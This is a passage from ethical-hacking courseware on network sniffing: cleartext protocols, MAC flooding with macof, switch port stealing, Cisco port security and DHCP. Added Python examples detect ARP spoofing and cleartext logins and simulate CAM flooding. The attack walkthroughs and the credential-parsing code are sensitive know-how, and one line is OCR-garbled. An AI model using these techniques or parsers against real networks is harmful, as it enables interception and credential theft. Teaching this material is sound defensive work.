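            self.alerts.append(f"WARNING: {mac} claims several IPs: {claimed}")

    def observe(self, payload: bytes) -> None:
        p = parse_arp(payload)
        if p["op"] == ARP_REQUEST:
            self.pending.add(p["tip"])
        elif p["op"] == ARP_REPLY:
            if p["sip"] in self.pending:
                self.pending.discard(p["sip"])
            else:
                self.alerts.append(
                    f"WARNING: unsolicited ARP reply for {p['sip']} from {p['smac']}")
        self._learn(p["sip"], p["smac"])   # both requests and replies carry a sender binding


# Constructed hosts: gateway, victim and attacker on one LAN.
GW_IP, GW_MAC = "10.0.0.1", "00:11:22:33:44:01"
VIC_IP, VIC_MAC = "10.0.0.2", "00:11:22:33:44:02"
ATK_IP, ATK_MAC = "10.0.0.3", "00:11:22:33:44:03"

SAMPLE_CAPTURE = [
    build_arp(ARP_REQUEST, VIC_MAC, VIC_IP, ZERO_MAC, GW_IP),   # victim asks for gateway
    build_arp(ARP_REPLY, GW_MAC, GW_IP, VIC_MAC, VIC_IP),       # gateway answers: normal
    build_arp(ARP_REQUEST, ATK_MAC, ATK_IP, ZERO_MAC, VIC_IP),  # attacker asks for victim
    build_arp(ARP_REPLY, VIC_MAC, VIC_IP, ATK_MAC, ATK_IP),     # victim answers: normal
    build_arp(ARP_REPLY, ATK_MAC, GW_IP, VIC_MAC, VIC_IP),      # spoofed "gateway is at ATK_MAC"
]


def run_monitor(capture=SAMPLE_CAPTURE, gateway_ip=GW_IP) -> list:
    mon = ArpMonitor(gateway_ip)
    for payload in capture:
        mon.observe(payload)
    return mon.alerts


if __name__ == "__main__":
    for alert in run_monitor():
        print(alert)
```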

Protocols Vulnerable to Sniffing
The following protocols are vulnerable to sniffing. The main reason for sniffing these protocols is to acquire passwords.
- Telnet and Rlogin
Telnet is a protocol used for communicating with a remote host (via port 23) on a network using a command-line terminal. rlogin enables an attacker to log in to a network machine remotely via a TCP connection. Neither of these protocols provides encryption; therefore, data traveling between clients connected through any of these protocols are in plaintext and vulnerable to sniffing. Attackers can sniff keystrokes, including usernames and passwords.
- HTTP
Due to vulnerabilities in the default version of HTTP, websites implementing HTTP transfer user data across the network in plaintext, which attackers can read to steal user credentials.
- SNMP
Simple Network Management Protocol (SNMP) is a TCP/IP-based protocol used for exchanging management information between devices connected on a network. The first version of SNMP (SNMPv1) does not offer strong security, which leads to the transfer of data in a cleartext format. Attackers exploit the vulnerabilities in this version to acquire passwords in plaintext.

- SMTP
Simple Mail Transfer Protocol (SMTP) is used for transmitting email messages over the Internet. In most implementations, SMTP messages are transmitted in cleartext, which enables attackers to capture plaintext passwords. Further, SMTP does not provide any protection against sniffing attacks.
- NNTP
Network News Transfer Protocol (NNTP) distributes, inquires into, retrieves, and posts news articles using a reliable stream-based transmission of news among the ARPA-Internet community. However, this protocol fails to encrypt the data, which allows attackers to sniff sensitive information.
- POP
Post Office Protocol (POP) allows a user's workstation to access mail from a mailbox server. A user can send mail from the workstation to the mailbox server via SMTP. Attackers can easily sniff the data flowing across a POP network in cleartext because of the protocol's weak security implementations.
- FTP
File Transfer Protocol (FTP) enables clients to share files between computers in a network. This protocol fails to provide encryption; therefore, attackers can sniff data, including user credentials, by running tools such as Cain & Abel.
- IMAP
Internet Message Access Protocol (IMAP) allows a client to access and manipulate electronic mail messages on a server. This protocol offers inadequate security, which allows attackers to obtain data and user credentials in cleartext.
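The following added detector (not code from the book) applies the point of this list from the monitoring side: it scans reassembled client streams for the cleartext logins of FTP, POP3, IMAP, SMTP AUTH PLAIN and HTTP Basic and reports them with the password masked. The streams and credentials are constructed samples; the port numbers are the protocols' standard ones.

```python
"""Flag cleartext authentication in the protocols listed above.
Constructed example; not code from the book. Input stands in for
reassembled TCP streams (destination port, decoded payload). Output
carries the username and a masked password, as an IDS or DLP alert would."""
import base64
import re

FTP, SMTP, HTTP, POP3, IMAP = 21, 25, 80, 110, 143
# Telnet (23) is omitted: its credentials arrive one keystroke per segment
# and need session reassembly before a USER/PASS-style match is possible.


def mask(secret: str) -> str:
    """Keep the first character so two findings can be told apart, hide the rest."""
    return secret[:1] + "*" * (len(secret) - 1)


def _user_pass(payload: str, user_cmd: str, pass_cmd: str):
    """USER/PASS dialogues (FTP, POP3): one command per line."""
    user = pwd = None
    for line in payload.splitlines():
        parts = line.strip().split(" ", 1)
        if len(parts) != 2:
            continue
        if parts[0].upper() == user_cmd:
            user = parts[1]
        elif parts[0].upper() == pass_cmd:
            pwd = parts[1]
    return user, pwd


def _imap_login(payload: str):
    m = re.search(r'^\S+\s+LOGIN\s+(\S+)\s+"?([^"\r\n]+)"?', payload, re.M | re.I)
    return (m.group(1), m.group(2)) if m else (None, None)


def _smtp_auth_plain(payload: str):
    m = re.search(r"^AUTH PLAIN (\S+)", payload, re.M | re.I)
    if not m:
        return None, None
    parts = base64.b64decode(m.group(1)).split(b"\0")   # authzid \0 authcid \0 password
    return (parts[1].decode(), parts[2].decode()) if len(parts) == 3 else (None, None)


def _http_basic(payload: str):
    m = re.search(r"^Authorization:\s*Basic\s+(\S+)", payload, re.M | re.I)
    if not m:
        return None, None
    user, sep, pwd = base64.b64decode(m.group(1)).decode().partition(":")
    return (user, pwd) if sep else (None, None)


DECODERS = {
    FTP:  ("FTP",        lambda p: _user_pass(p, "USER", "PASS")),
    POP3: ("POP3",       lambda p: _user_pass(p, "USER", "PASS")),
    IMAP: ("IMAP",       _imap_login),
    SMTP: ("SMTP",       _smtp_auth_plain),
    HTTP: ("HTTP Basic", _http_basic),
}


def find_cleartext_credentials(flows):
    """flows: iterable of (dst_port, payload_text). One finding per exposed login."""
    findings = []
    for port, payload in flows:
        if port not in DECODERS:
            continue              # e.g. 443: TLS, nothing readable
        proto, decode = DECODERS[port]
        user, pwd = decode(payload)
        if user is not None and pwd is not None:
            findings.append({"proto": proto, "port": port,
                             "user": user, "password": mask(pwd)})
    return findings


# Constructed sample streams (the base64 values are built here, not captured).
SAMPLE_FLOWS = [
    (FTP,  "USER alice\r\nPASS s3cret\r\nLIST\r\n"),
    (HTTP, "GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
           "Authorization: Basic " + base64.b64encode(b"bob:hunter2").decode() + "\r\n\r\n"),
    (SMTP, "EHLO client\r\nAUTH PLAIN "
           + base64.b64encode(b"\0carol\0pa55word").decode() + "\r\n"),
    (POP3, "USER eve\r\nPASS qwerty\r\nSTAT\r\n"),
    (IMAP, '* OK IMAP4rev1 ready\r\na001 LOGIN dave "letmein"\r\n'),
    (443,  "(TLS records; not inspectable)"),
]

if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_FLOWS):
        print(f"{f['proto']:10} port {f['port']:<4} user={f['user']} password={f['password']}")
```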

Sniffing in the Data Link Layer of the OSI Model
The OSI model describes network functions as a series of seven layers. Each layer provides services to the layer above and receives services from the layer below. The data link layer is the second layer of the OSI model. In this layer, data packets are encoded and decoded into bits. Sniffers operate at the data link layer and can capture packets from this layer. Networking layers in the OSI model are designed to work independently of each other; thus, if a sniffer sniffs data in the data link layer, the upper OSI layers will not be aware of the sniffing.

Figure 8.10: Sniffing in the data link layer of the OSI model

Hardware Protocol Analyzers
A hardware protocol analyzer is a device that interprets traffic passing over a network. It captures signals without altering the traffic segment. Its purpose is to monitor network usage and identify malicious network traffic generated by hacking software installed on the network. It captures a data packet, decodes it, and analyzes its content according to predetermined rules. It allows an attacker to see the individual data bytes of each packet passing through the network.
Compared to software protocol analyzers, hardware protocol analyzers are capable of capturing more data without packet drops at the time of data overload. Hardware protocol analyzers provide a wide range of network connection options varying from LAN, WAN, and wireless to circuit-based telco network lines. They are capable of displaying bus states and low-level events such as high-speed negotiation (K/J chirps), transmission errors, and retransmissions. The analyzers provide accurate timestamps of the captured traffic. However, hardware analyzers are more expensive and tend to be out of reach for individual developers, hobbyists, and ordinary hackers.
Hardware protocol analyzers from different manufacturers include:
- Voyager M4x Protocol Analyzer
Source: https://teledynelecroy.com
The Voyager M4x analyzer platform provides accurate and reliable capture of USB4 and Thunderbolt 3 protocols for fast debugging, analysis, and problem-solving. Voyager M4x features the highest-fidelity probe design and provides unmatched reliability when testing devices at the full USB4 Gen3x2 (40 Gb/s aggregate) speed.

Figure 8.11: Voyager M4x Protocol Analyzer
- N2X N5540A Agilent Protocol Analyzer
Source: https://www.valuetronics.com
The Agilent N2X is a test solution for testing the development and deployment of network services for converging network infrastructures. Service providers, network equipment manufacturers (NEMs), and component manufacturers can verify service attributes of entire networks end-to-end, while also isolating problems down to individual networking devices and subsystems. Two different types of cards can be configured simultaneously, allowing for test scenarios that use a combination of port types.

Figure 8.12: N2X N5540A Agilent Protocol Analyzer
Some examples of hardware protocol analyzers are listed below:
- Keysight E2960B (https://www.keysight.com)
- STINGA Protocol Analyzer (https://utelsystems.com)
- NETSCOUT OneTouch AT Network Assistant (https://enterprise.netscout.com)
- NETSCOUT OptiView XG Network Analysis Tablet (https://enterprise.netscout.com)
- Agilent (Keysight) Technologies 8753ES (https://www.microlease.com)

SPAN Port
Switched Port Analyzer (SPAN) is a Cisco switch feature, also known as "port mirroring," that monitors network traffic on one or more ports on the switch. A SPAN port is a port that is configured to receive a copy of every packet that passes through a switch. It helps to analyze and debug data, identify errors, and investigate unauthorized network access. When port mirroring is on, the network switch sends a copy of the network packets from the source port to the destination port, which studies the network packets with the help of a network analyzer. There can be one or more sources, but there should be only one destination port on the switch. Source ports are the ports for which network packets are monitored and mirrored. The user can simultaneously monitor the traffic of multiple ports, such as the traffic on all the ports of a specific virtual local area network (VLAN).

Figure 8.13: Working of SPAN

Wiretapping
Wiretapping, or telephone tapping, refers to the monitoring of telephone or Internet conversations by a third party with covert intentions. To perform wiretapping, the attacker first selects a target person or host on the network to wiretap and then connects a listening device (hardware, software, or a combination of both) to the circuit carrying information between the two target phones or hosts. Typically, the attacker uses a small amount of the electrical signals generated by the telephone wires to tap the conversation. This allows attackers to monitor, intercept, access, and record information contained in the data flow in a communication system.
Wiretapping Methods
The following are ways to perform wiretapping:
- The official tapping of telephone lines
- The unofficial tapping of telephone lines
- Recording the conversation
- Direct line wiretap
- Radio wiretap

Types of Wiretapping
There are two types of wiretapping that an attacker can use to monitor, record, and even alter the data flow in the communication system.
- Active Wiretapping
In hacking terminology, active wiretapping is an MITM attack. This allows an attacker to monitor and record the traffic or data flow in a communication system. The attacker can also alter or inject data into communication or traffic.
- Passive Wiretapping
Passive wiretapping is snooping or eavesdropping. This allows an attacker to monitor and record traffic. By observing the recorded traffic flow, the attacker can snoop for a password or other information.

Note: Wiretapping without a warrant or the consent of the people conducting the conversation is a criminal offense and is punishable in most countries, depending on the country's law.

Lawful Interception
Lawful interception (LI) refers to legally intercepting data communication between two endpoints for surveillance on traditional telecommunications, VoIP, data, and multiservice networks. LI obtains data from a communication network for analysis or evidence. This is useful in activities like infrastructure management and protection, as well as cybersecurity-related issues. Here, the network operator or service provider legally sanctions access to private network data for monitoring private communications like telephone calls and email messages. Such operations are carried out by law enforcement agencies (LEAs).
This type of interception is necessary only to monitor messages exchanged on suspicious channels in which the users are engaged in illegal activity. Countries around the world are making strides to standardize this type of procedure for interception.
The figure shows the telco/ISP lawful interception solution provided by the Decision Computer Group. The solution consists of one tap/access switch and multiple systems for the reconstruction of intercepted data. The tap/access switch collects traffic from the Internet service provider (ISP) network, sorts the traffic by IP domain, and serves it to E-Detective (ED) systems that decode and reconstruct the intercepted traffic into its original format. The tool performs this with the help of supporting protocols such as POP3, IMAP, SMTP, P2P, FTP, and telnet. The Centralized Management Server (CMS) manages all the ED systems.

Sniffing Technique: MAC Attacks
Attackers use various sniffing techniques, such as MAC attacks, DHCP attacks, ARP poisoning, spoofing attacks, and DNS poisoning, to steal and manipulate sensitive data. Attackers use these techniques to gain control over a target network by reading captured data packets and then using that information to break into the network.
This section discusses MAC attacks or MAC flooding. Attackers use the MAC flooding technique to force a switch to act as a hub, so that they can easily sniff the traffic.

MAC Address
A MAC address uniquely identifies each node of a network. Each device in the network has a MAC address associated with a physical port on the network switch, which makes it possible to designate a specific single point of the network. MAC addresses are used as network addresses for most IEEE 802 network technologies, including Ethernet. Logically, the MAC protocol in the OSI reference model uses MAC addresses for information transfer.
A MAC address comprises 48 bits that are split into two sections, each containing 24 bits. The first section contains the ID number of the organization that manufactured the adapter and is called the organizationally unique identifier (OUI). The next section contains the serial number assigned to the NIC adapter and is called the NIC specific.
The MAC address contains 12-digit hexadecimal numbers, divided into three or six groups. The first six digits indicate the manufacturer, while the next six digits indicate the adapter's serial number. For example, consider the MAC address D4-BE-D9-14-C8-29. The first six digits, i.e., D4BED9, indicate the manufacturer (Dell, Inc.), and the next six digits, 14C829, indicate the serial number of the adapter.

Figure 8.15: MAC address (3-byte Organizationally Unique Identifier (OUI) followed by 3-byte Network Interface Controller (NIC) Specific; in the first byte, bit a1 is 0 for unicast and 1 for multicast, and bit a2 is 0 for globally unique and 1 for locally administered)
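An added example, not from the book, that parses a MAC address into the fields of Figure 8.15 (OUI, NIC specific, multicast and locally-administered bits) in dash, colon and Cisco dotted notation, and applies the sanity checks a sensor can run on a frame's source address. KNOWN_OUIS is a placeholder holding only the book's Dell example, not the IEEE registry.

```python
"""Split a MAC address into OUI, NIC-specific part and flag bits.
Constructed example, not code from the book; KNOWN_OUIS is a
placeholder holding only the book's example, not the IEEE registry."""
import re

KNOWN_OUIS = {"D4BED9": "Dell Inc."}   # from the text above; real lookups use the IEEE OUI list


def mac_bytes(mac: str) -> bytes:
    """Accept D4-BE-D9-14-C8-29, d4:be:d9:14:c8:29 or d4be.d914.c829."""
    digits = re.sub(r"[-:.]", "", mac.strip())
    if not re.fullmatch(r"[0-9A-Fa-f]{12}", digits):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return bytes.fromhex(digits)


def parse_mac(mac: str) -> dict:
    raw = mac_bytes(mac)
    first = raw[0]
    oui = raw[:3].hex().upper()
    return {
        "canonical": "-".join(f"{b:02X}" for b in raw),
        "oui": oui,                                   # first 24 bits: manufacturer
        "nic_specific": raw[3:].hex().upper(),        # last 24 bits: adapter serial
        "vendor": KNOWN_OUIS.get(oui),
        # bit a1 (least significant) of the first byte: 0 unicast, 1 multicast
        "multicast": bool(first & 0x01),
        # bit a2 of the first byte: 0 globally unique (burned in), 1 locally administered
        "locally_administered": bool(first & 0x02),
    }


def source_address_problems(mac: str) -> list:
    """Checks a switch or sensor can apply to a frame's source MAC: a multicast
    source is never valid on the wire, and a source whose OUI is not registered
    is what a stream of randomly generated flooding addresses looks like."""
    info = parse_mac(mac)
    problems = []
    if info["multicast"]:
        problems.append("multicast bit set in source address")
    if info["vendor"] is None:
        problems.append(f"OUI {info['oui']} not in registry")
    return problems


if __name__ == "__main__":
    print(parse_mac("D4-BE-D9-14-C8-29"))
    print(source_address_problems("01:00:5e:00:00:fb"))
```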
CAM Table
A CAM table is a dynamic table of fixed size. It stores information such as MAC addresses available on physical ports along with VLAN parameters associated with them. When a machine sends data to another machine in a network, the data passes through the switch. The switch searches for the destination MAC address (located in the Ethernet frame) in its CAM table, and once the MAC address is found, it forwards data to the machine through the port with which the MAC address is bound. This method of transferring data in a switched network is more secure than that of a hub-based network, in which the hub forwards the incoming traffic to all the machines in the network.

CAM table example (columns: VLAN, MAC Address, Type, Learn, Ports; all entries shown are dynamically learned)

How CAM Works
A CAM table refers to the dynamic form of content and works with an Ethernet switch. The Ethernet switch maintains connections between ports, and the CAM table keeps track of MAC address locations on the switch, but the table is limited in size. If the CAM table is flooded with more MAC addresses than it can hold, the switch will turn into a hub. The CAM table does this to ensure the delivery of data to the intended host. Attackers exploit this vulnerability in the CAM table to sniff network data. An attacker who can connect to the shared switch of the Ethernet segment can easily sniff network data.
Refer to the diagrams of the working of the CAM table. Three machines are shown: Machine A, Machine B, and Machine C, each holding MAC addresses A, B, and C. Machine A, holding the MAC address A, wants to interact with Machine B.
Machine A broadcasts an ARP request to the switch. The request contains the IP address of the target machine (Machine B), along with the source machine's (Machine A) MAC and IP addresses. The switch then broadcasts this ARP request to all the hosts in the network and waits for the reply.

Figure 8.16: Working of CAM table step 1

Machine B possesses the target/destination IP address, so it sends an ARP reply along with its MAC address. The CAM table stores this MAC address along with the port on which this machine is connected.

Figure 8.17: Working of CAM table step 2

Now the connection is successfully established, and Machine A forwards the traffic to Machine B, while Machine C is unable to see the traffic flowing between them.

Figure 8.18: Working of CAM table step 3

What Happens when a CAM Table is Full?
As discussed, a CAM table contains network information such as MAC addresses available on physical switch ports and associated VLAN parameters. A CAM table's limited size renders it susceptible to attacks from MAC flooding, which bombards the switch with fake source MAC addresses until the CAM table is full. Thereafter, the switch broadcasts all incoming traffic to all ports. This causes the switch to reset to its learning mode, causing the switch to broadcast on every port similar to a hub, thereby enabling the attacker to monitor the frames sent from the victim host to another host without any CAM table entry. This attack also fills the CAM tables of adjacent switches.
The figure illustrates how a CAM table can be flooded with fake MAC addresses to monitor the frames sent from the victim host to another host without any CAM table entry.

Figure 8.19: Flooding a CAM table

MAC Flooding
MAC flooding is a technique used to compromise the security of network switches that connect network segments or devices. Attackers use the MAC flooding technique to force a switch to act as a hub so that they can easily sniff the traffic.
In a switched network, an Ethernet switch contains a CAM table that stores all the MAC addresses of devices connected in the network. A switch acts as an intermediate device between one or more computers in a network. It looks for Ethernet frames, which carry the destination MAC address; then, it tallies this address with the MAC address in its CAM table and forwards the traffic to the destined machine. Unlike a hub, which broadcasts data across the network, a switch sends data only to the intended recipient. Thus, a switched network is more secure compared to a hub network. However, the size of the CAM table is fixed, and as it can store only a limited number of MAC addresses in it, an attacker may send numerous fake MAC addresses to the switch. No problem occurs until the MAC address table is full. Once the MAC address table is full, any further requests may force the switch to enter fail-open mode. In the fail-open mode, the switch starts behaving like a hub and bro-dcasts all incoming traffic through all the ports in the network. The attacker then changes his/her machine's NIC to promiscuous mode to enable the machine to accept all the traffic entering it. Thus, attackers can sniff the traffic easily and steal sensitive information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure 8.20: MAC flooding

MAC Flooding with macof
Source: https://monkey.org

macof is a Unix/Linux tool that is a part of the dsniff collection. It floods the local network with random MAC and IP addresses, causing some switches to fail and open in repeating mode, thereby facilitating sniffing. This tool floods the switch's CAM tables (131,000 per min) by sending forged MAC entries. When the MAC table fills up, and the switch converts to hub-like operation, an attacker can monitor the data being broadcast.

Figure 8.21: MAC flooding using macof

Switch Port Stealing

The switch port stealing sniffing technique uses MAC flooding to sniff the packets. The attacker floods the switch with forged gratuitous ARP packets with the target MAC address as the source and his/her own MAC address as the destination. A race condition of the attacker's flooded packets and target host packets will occur, and thus, the switch has to change its MAC address binding constantly between two different ports. In this case, if the attacker is fast enough, he/she will be able to direct the packets intended for the target host toward his switch port. Here, the attacker manages to steal the target host switch port and sends an ARP request to this switch port to discover the target host's IP address. When the attacker gets an ARP reply, this indicates that the target host's switch port binding has been restored and the attacker can now sniff the packets sent towards the targeted host.

Figure 8.22: Switch port stealing
Assume that there are three machines in a network: Host A, the target's Host B, and the attacker's Host C.

Machine | MAC Address       | IP Address
Host A  | aa-bb-cc-dd-ee-ff | 10.0.0.1
Host B  | bb-cc-dd-ee-ff-gg | 10.0.0.2
Host C  | cc-dd-ee-ff-gg-hh | 10.0.0.3

Table 8.2: Details of three hosts in a network
The switch's ARP cache and MAC table contain the following values:

MAC Table

Host   | MAC Address       | IP Address | VLAN | Type
Host A | aa-bb-cc-dd-ee-ff | 10.0.0.1   | 5    | Learn
Host B | bb-cc-dd-ee-ff-gg | 10.0.0.2   | 5    | Learn
Host C | cc-dd-ee-ff-gg-hh | 10.0.0.3   | 5    | Learn

Table 8.3: MAC table

ARP Cache

IP Address | MAC Address
10.0.0.1   | aa-bb-cc-dd-ee-ff
10.0.0.2   | bb-cc-dd-ee-ff-gg
10.0.0.3   | cc-dd-ee-ff-gg-hh

Table 8.4: ARP cache table
1. Switch port stealing is a sniffing technique used by an attacker who spoofs both the IP address and the MAC address of the target machine (Host B).
Machine | MAC Address       | IP Address
Host A  | aa-bb-cc-dd-ee-ff | 10.0.0.1
Host B  | bb-cc-dd-ee-ff-gg | 10.0.0.2
Host C  | bb-cc-dd-ee-ff-gg | 10.0.0.2

Table 8.5: Switch updated with a spoofed entry
2. The attacker's machine runs a sniffer that turns the machine's NIC adapter to promiscuous mode.
3. Host A, associated with the IP address (10.0.0.1), wants to communicate with Host B, associated with the IP address (10.0.0.2). Therefore, host A sends an ARP request (I want to communicate with 10.0.0.2. What is the MAC address of 10.0.0.2?).
4. The switch broadcasts this ARP request to all the machines in the network.
5. Before Host B (the target machine) can respond to the ARP request, the attacker responds to the ARP request by sending an ARP reply containing the spoofed MAC and IP addresses (I am 10.0.0.2, and my MAC address is bb-cc-dd-ee-ff-gg). The attacker can achieve this by launching an attack such as denial of service (DoS) on Host B, which slows down its response.
6. Now the ARP cache in the switch records the spoofed MAC and IP addresses.
IP Address | MAC Address
10.0.0.1   | aa-bb-cc-dd-ee-ff
10.0.0.2   | bb-cc-dd-ee-ff-gg
10.0.0.2   | bb-cc-dd-ee-ff-gg

Table 8.6: ARP cache updated with spoofed entry

7. The spoofed MAC address of target Host B (bb-cc-dd-ee-ff-gg) and the port connected to the attacker's machine (Port C) update the switch's CAM table. Now, a connection is established between Host A and the attacker's machine (Host C).

Host   | MAC Address       | IP Address | Type  | Age | Port
Host A | aa-bb-cc-dd-ee-ff | 10.0.0.1   | learn | 0   | Port A
Host B | bb-cc-dd-ee-ff-gg | 10.0.0.2   | learn | 0   | Port B
Host C | bb-cc-dd-ee-ff-gg | 10.0.0.2   | learn | 0   | Port C

Table 8.7: MAC table updated with a spoofed entry
8. Now, the system will forward all the packets directed towards Host B to Host C through Port C, i.e., the attacker's machine. Thus, an attacker can sniff the packets sent to Host B.

How to Defend against MAC Attacks

Port security is a feature that identifies and limits the MAC addresses of the machines that can access the port. If you assign a secure MAC address to a secure port, then the port will forward only the packets with source addresses inside the group of defined addresses.

A security violation occurs:
- When a port is configured as a secure port, and the maximum number of secure MAC addresses is reached
- When the MAC address of the machine that is attempting to access the port does not match any of the identified secure MAC addresses

Once the maximum number of secure MAC addresses on the port is set, the secure MAC addresses are included in an address table in any of the following three ways:
- You can configure all secure MAC addresses by using the switchport port-security mac-address interface configuration command.
- You can allow the port to dynamically configure secure MAC addresses with the MAC addresses of the connected devices.
- You can configure a number of addresses and allow the rest to be dynamically configured.

Port security limits MAC flooding attacks and locks down ports, sending an SNMP trap.

As shown in the figure, the attacker floods the switch CAM tables with fake MAC addresses and thus threatens security by turning a switch into a hub.

Figure 8.23: Flooding CAM tables
As shown in the figure, the number of MAC addresses allowed on the switch port is limited to one; therefore, the MAC requests are recognized as flooding. Port security locks down the port and sends an SNMP trap.
Figure 8.24: Blocking MAC flooding

Configuring Port Security on Cisco Switch
Source: https://www.cisco.com
Steps to restrict traffic through a port by limiting and identifying MAC addresses of the stations allowed to access the port:
1. interface interface_id
Enters interface configuration mode and enters the physical interface to configure, for example, gigabitethernet 3/1.
2. switchport mode access
Sets the interface mode as access; an interface in the default mode (dynamic desirable) cannot be configured as a secure port.
3. switchport port-security
Enables port security on the interface.
4. switchport port-security maximum value
Sets the maximum number of secure MAC addresses for the interface. The range is 1 to 3072; the default is 1.

5. switchport port-security violation {restrict | shutdown}
Sets the violation mode, the action to be taken when a security violation is detected.
6. switchport port-security limit rate invalid-source-mac
Sets the rate limit for bad packets.
7. switchport port-security mac-address mac_address
Enters a secure MAC address for the interface. You can use this command to enter the maximum number of secure MAC addresses.
8. switchport port-security mac-address sticky
Enables sticky learning on the interface.
9. end
Returns to privileged EXEC mode.
10. show port-security address
Verifies your entries.
Some additional commands to configure the Cisco port security feature:
switchport port-security maximum 1 vlan access
Sets the maximum number of secure MAC addresses for the interface. The range is 1 to 3072. The default is 1.
switchport port-security aging time 2
Sets the aging time for the secure port.
switchport port-security aging type inactivity
The type keyword sets the aging type as absolute or inactivity.
snmp-server enable traps port-security trap-rate 5
Controls the rate at which SNMP traps are generated.
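The fixed-size CAM table described under MAC Flooding and the per-port maximum configured by the port-security commands above, modelled in Python as an added example that is not code from the courseware or from Cisco. The CAM capacity, port names and bogus MAC values are constructed assumptions; real switches hold far more entries and report violations differently.

```python
"""Switch CAM table under MAC flooding, with and without port security.

Added example, not code from the EC-Council courseware or from Cisco. The
CAM capacity, port names and bogus MAC values are constructed assumptions.
"""
from collections import OrderedDict


class Switch:
    """Fixed-size CAM table (MAC -> port) that floods frames it cannot look up."""

    def __init__(self, ports, cam_capacity, port_security=None, violation="restrict"):
        self.ports = set(ports)
        self.cam_capacity = cam_capacity
        self.cam = OrderedDict()                       # learned MAC -> ingress port
        # port_security maps a port to its 'switchport port-security maximum' value
        self.port_security = dict(port_security or {})
        self.violation = violation                     # 'restrict' or 'shutdown'
        self.secure_macs = {p: set() for p in self.port_security}
        self.shutdown_ports = set()
        self.traps = []                                # one record per violation (SNMP trap)

    def learn(self, src_mac, port):
        """Source-MAC learning for a frame arriving on port. Returns True if accepted."""
        if port in self.shutdown_ports:
            return False                               # err-disabled port drops everything
        if port in self.port_security:
            allowed = self.secure_macs[port]
            if src_mac not in allowed:
                if len(allowed) >= self.port_security[port]:
                    # Violation: maximum reached and the MAC is not a secure address
                    self.traps.append((port, src_mac, self.violation))
                    if self.violation == "shutdown":
                        self.shutdown_ports.add(port)
                    return False                       # restrict: drop the frame
                allowed.add(src_mac)                   # dynamically learned secure MAC
        if src_mac in self.cam or len(self.cam) < self.cam_capacity:
            self.cam[src_mac] = port
        # When the table is full the frame is still accepted, but its MAC is never learned
        return True

    def forward(self, dst_mac, ingress):
        """Egress ports for a frame to dst_mac: unicast if known, else flood (hub behaviour)."""
        if dst_mac in self.cam:
            return {self.cam[dst_mac]}
        return self.ports - {ingress}


def run_scenario(port_security=None, violation="restrict"):
    """Host A and Host B are legitimate; the attacker on PortC sprays bogus source MACs.
    Returns the switch and the egress ports chosen for a frame from A to B."""
    sw = Switch(["PortA", "PortB", "PortC"], cam_capacity=8,
                port_security=port_security, violation=violation)
    sw.learn("aa-bb-cc-dd-ee-ff", "PortA")            # Host A (the courseware's sample address)
    for i in range(20):                                # macof-style flood, constructed values
        sw.learn("02-00-00-00-00-%02x" % i, "PortC")
    sw.learn("bb-cc-dd-ee-ff-01", "PortB")            # Host B sends its first frame afterwards
    return sw, sw.forward("bb-cc-dd-ee-ff-01", ingress="PortA")


if __name__ == "__main__":
    for cfg in (None, {"PortC": 1}):
        sw, egress = run_scenario(cfg)
        print("port-security=%s CAM=%d traps=%d A->B egress=%s"
              % (cfg, len(sw.cam), len(sw.traps), sorted(egress)))
```

Without port security the flood leaves no room to learn Host B, so Host A's frame to B is flooded to every port including the attacker's; with a maximum of one secure MAC on PortC the bogus addresses are dropped and counted as violations, and A to B stays unicast.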

Sniffing Technique: DHCP Attacks

This section discusses various Dynamic Host Configuration Protocol (DHCP) attacks. A DHCP attack is an active sniffing technique used by the attackers to steal and manipulate sensitive data. This section describes how DHCP works, DHCP starvation attacks, tools used for starvation attacks, rogue server attacks, and different ways to defend against DHCP attacks.
How DHCP Works

DHCP is a client-server protocol that provides an IP address to an IP host. In addition to the IP address, the DHCP server also provides configuration-related information such as the default gateway and subnet mask. When a DHCP client device boots up, it participates in traffic broadcasting.

DHCP can assign IP configuration to hosts connecting to a network. The distribution of IP configuration to hosts simplifies the administrator's work to maintain IP networks. DHCP servers maintain TCP/IP configuration information in a database such as valid TCP/IP configuration parameters, valid IP addresses, and duration of the lease offered by the server. It provides address configurations to DHCP-enabled clients in the form of a lease offer.
Working of DHCP:
1. The client broadcasts a DHCPDISCOVER/SOLICIT request asking for DHCP configuration information.
2. A DHCP-relay agent captures the client request and unicasts it to the DHCP servers available in the network.
3. A DHCP server unicasts DHCPOFFER/ADVERTISE, which contains the client's and server's MAC addresses.

4. The relay agent broadcasts DHCPOFFER/ADVERTISE in the client's subnet.
5. The client broadcasts DHCPREQUEST/REQUEST asking the DHCP server to provide the DHCP configuration information.
6. The DHCP server sends a unicast DHCPACK/REPLY message to the client with the IP configuration and information.

Figure 8.25: Working of DHCP

DHCP Request/Reply Messages

A device that already has an IP address can use the simple request/reply exchange to obtain other configuration parameters from a DHCP server. When the DHCP client receives a DHCP offer, the client immediately responds by sending back a DHCP request packet. Devices that are not using DHCP to acquire IP addresses can still utilize DHCP's other configuration capabilities. A client can broadcast a DHCPINFORM message to request that any available server send its parameters on the usage of the network. DHCP servers respond with the requested parameters and/or default parameters carried in DHCP options of a DHCPACK message. If a DHCP request comes from a hardware address that is in the DHCP server's reserved pool and the request is not for the IP address that this DHCP server offered, the DHCP server's offer is invalid. The DHCP server can put that IP address back into the pool and offer it to another client.

DHCP Message | DHCPv6 Message                  | Description
DHCPDiscover | Solicit                         | Client broadcast to locate the available DHCP servers
DHCPOffer    | Advertise                       | Server to client in response to DHCPDiscover with the offer of configuration parameters
DHCPRequest  | Request, Confirm, Renew, Rebind | Client to servers either (a) requesting offered parameters, (b) confirming the correctness of the previously allocated address, or (c) extending the lease period
DHCPACK      | Reply                           | Server to client with configuration parameters, including the committed network address
DHCPRelease  | Release                         | Client to server relinquishing the network address and canceling the lease
DHCPDecline  | Decline                         | Client to server indicating that the network address is already in use
N/A          | Reconfigure                     | Server to client saying that it has new or updated configuration settings. The client then sends either a renew/reply or information-request/reply transaction to get the updated information
DHCPInform   | Information-Request             | Client to server asking for only local configuration parameters; the client already has an externally configured network address
N/A          | Relay-Forward                   | A relay agent sends a relay-forward message to relay messages to servers, either directly or through another relay agent
N/A          | Relay-Reply                     | A server sends a relay-reply message to a relay agent containing a message that the relay agent delivers to a client
DHCPNAK      | N/A                             | Server to client indicating that the client's notion of the network address is incorrect (e.g., the client has moved to a new subnet) or the client's lease has expired

Table 8.8: DHCP request/reply messages

IPv4 DHCP Packet Format

